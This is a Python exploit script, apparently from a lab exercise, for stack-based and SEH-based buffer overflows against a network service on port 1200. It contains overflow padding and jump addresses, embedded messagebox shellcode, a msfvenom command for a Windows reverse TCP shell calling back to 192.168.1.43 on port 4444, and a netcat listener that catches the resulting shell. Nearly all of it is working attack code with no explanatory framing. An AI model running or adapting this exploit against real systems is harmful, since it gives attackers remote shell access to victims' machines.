Reverse_Shell_Payload.py

# Code to perform Stack Based and SEH based Buffer Overflow and get Shell access.

import time
import socket
import subprocess
host = '127.0.0.1'		# Ip Address of the Target Machine
port = 1200                  	# Open port on the Server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))		# Connecting to the Port on target machine

# Stack-Based Buffer Overflow

junk = b"A"*548			# Number of A's to send
EIP = b'\xdf\x11\x0c\x61'	# JMP EIP Address
move_esp = b'\x81\xc4\xc0\xfd\xff\xff'

# Creating a reverse_tcp Shellcode using metasploit.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.43 LPORT=4444 -b '\x00\x0a\x0d' -f c

reverse_tcp = b'<Enter Payload>'

# shellcode for displaying a messagebox.

msgbox = b"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"

# For SEH Based
junk_seh = b'A'*636			# Number of A's to send
next_seh = b'\xeb\x04\x90\x90'		# 4 byte JMP Address
seh = b'\x0b\x14\x0c\x61'		# Address of SEH
nops = b'\x90'*4

# To run SEH Based exploit umcomment the following SEH Based exploit and comment the Stack Based exploit.

# s.sendall(junk_seh+next_seh+seh+nops+msgbox)	# SEH Base Exploit
s.sendall(junk+EIP+move_esp+reverse_tcp)	# STACK-Based Exploit
s.close()					# Closing Port 1200
print("The message has been sent.")

# Calling Netcat command to listen to port 4444 and get the shell of target machine.

from subprocess import call
call(["nc","-lvp","4444"])